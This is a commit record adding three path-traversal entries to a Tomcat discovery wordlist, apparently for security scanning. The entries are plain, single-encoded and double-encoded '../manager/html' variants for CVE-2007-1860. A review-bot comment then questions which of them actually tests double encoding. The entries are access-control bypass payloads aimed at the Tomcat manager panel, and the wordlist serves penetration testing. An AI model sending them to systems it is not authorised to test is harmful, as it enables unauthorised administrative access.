Support for CVE-2007-1860 mod_jk double encoding
Added paths that will check access control bypass using double encoding (CVE-2007-1860) that could allow a remote user to access Tomcat's administration panel.
Based on the scenario demonstrated on https://pentesterlab.com/exercises/cve-2007-1860/course
henshin authored Jul 28, 2016
1 parent c874149 commit fff5faa
Showing 1 changed file with 3 additions and 0 deletions.
3 changes: 3 additions & 0 deletions Discovery/Web_Content/tomcat.txt
Expand Up @@ -21,6 +21,9 @@ examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
examples/servlet/snoop
examples/servlets/index.html
examples/../manager/html
examples/%2e%2e/manager/html
examples/%252e%252e/manager/html
host-manager
host-manager/add
host-manager/host-manager.xml
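
Review bot: of the three added entries, only `examples/%252e%252e/manager/html` is double encoded, which is what the commit message says this change checks for CVE-2007-1860. `examples/../manager/html` is unencoded and `examples/%2e%2e/manager/html` is single encoded, and many HTTP clients collapse a literal `../` before the request is sent, so a response to either of those two does not by itself point to the double-encoding issue and can look the same as a plain `manager/html` request. Suggest either dropping those two or stating in the commit message that they are baselines for comparison, so whoever triages the scan output knows which hit maps to the CVE. Minor: the surrounding entries look alphabetically sorted and these three are placed after `examples/servlets/index.html`; if the list is meant to stay sorted, they belong earlier in the `examples/` group.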